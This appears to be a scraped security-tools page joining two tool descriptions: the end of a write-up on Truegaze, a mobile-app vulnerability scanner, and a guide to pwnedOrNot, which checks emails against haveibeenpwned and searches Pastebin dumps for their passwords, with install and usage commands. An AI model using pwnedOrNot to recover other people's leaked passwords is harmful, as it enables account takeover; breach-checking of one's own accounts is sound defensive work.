http://my.43434server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cl n,{a.PrevSessionLength} Done! Display installed version: [email protected]:~/$ truegaze version Current version: v0.2 Structure The application is command line and will consist of several modules that check for various vulnerabilities. Each module does its own scanning, and all results get printed to command line. Reporting bugs and feature requests Please use the GitHub issue tracker to report issues or suggest features: https://github.com/nightwatchcybersecurity/truegaze You can also send emai to _ research /at/ nightwatchcybersecurity [dot] com _ Wishlist More unit test coverage for code that interacts with Click Ability to extract additional files from online source Ability to check if a particular vulnerability is exploitable Ability to produce JSON or XML output that can feed into other tools More modules! About the name “True Gaze” or “Истинное Зрение” is a magical spell that reveals the invisible (from the book “Last Watch” by Sergei Lukyanenko) Download Truegaze

image
OSINT Tool to Find Passwords for Compromised Email Accounts pwnedOrNot uses haveibeenpwned v2 api to test email accounts and tries to find the password in Pastebin Dumps . Featured OSINT Collection Tools for Pastebin – Jake Creps Get In Touch Twitter Telegram Blog Changelog Features haveibeenpwned offers a lot of information about the compromised email, some useful information is displayed by this script: Name of Breach Domain Name Date of Breach Fabrication status Verification Status Retirement status Spam Status And with all this information pwnedOrNot can easily find passwords for compromised emails if the dump is accessible and it contains the password Tested on Kali Linux 2019.1 BlackArch Linux Ubuntu 18.04 Kali Nethunter Termux Installation Ubuntu / Kali Linux / Nethunter / Termux git clone https://github.com/thewhiteh4t/pwnedOrNot.git cd pwnedOrNot pip3 install requests BlackArch Linux pacman -S pwnedornot Updates cd pwnedOrNot git pull Usage python3 pwnedornot.py -h usage: pwnedornot.py [-h] [-e EMAIL] [-f FILE] [-d DOMAIN] [-n] [-l] [-c CHECK] optional arguments: -h, –help show this help message and exit -e EMAIL, –email EMAIL Email Address You Want to Test -f FILE, –file FILE Load a File with Multiple Email Addresses -d DOMAIN, –domain DOMAIN Filter Results by Domain Name -n, –nodumps Only Check Breach Info and Skip Password Dumps -l, –list Get List of all pwned Domains -c CHECK, –check CHECK Check if your Domain is pwned # Examples # Check Single Email python3 pwnedornot.py -e #OR python3 pwnedornot.py –email # Check Multiple Emails from File python3 pwnedornot.py -f #OR python3 pwnedornot.py –file # Filter Result for a Domai n Name [Ex : adobe.com] python3 pwnedornot.py -e -d #OR python3 pwnedornot.py -f –domain # Get only Breach Info, Skip Password Dumps python3 pwnedornot.py -e -n #OR python3 pwnedornot.py -f –nodumps # Get List of all Breached Domains python3 pwnedornot.py -l #OR python3 pwnedornot.py –list # Check if a Domain is Pwned python3 pwnedornot.py -c #OR python3 pwnedornot.py –check Demo Download pwnedOrNot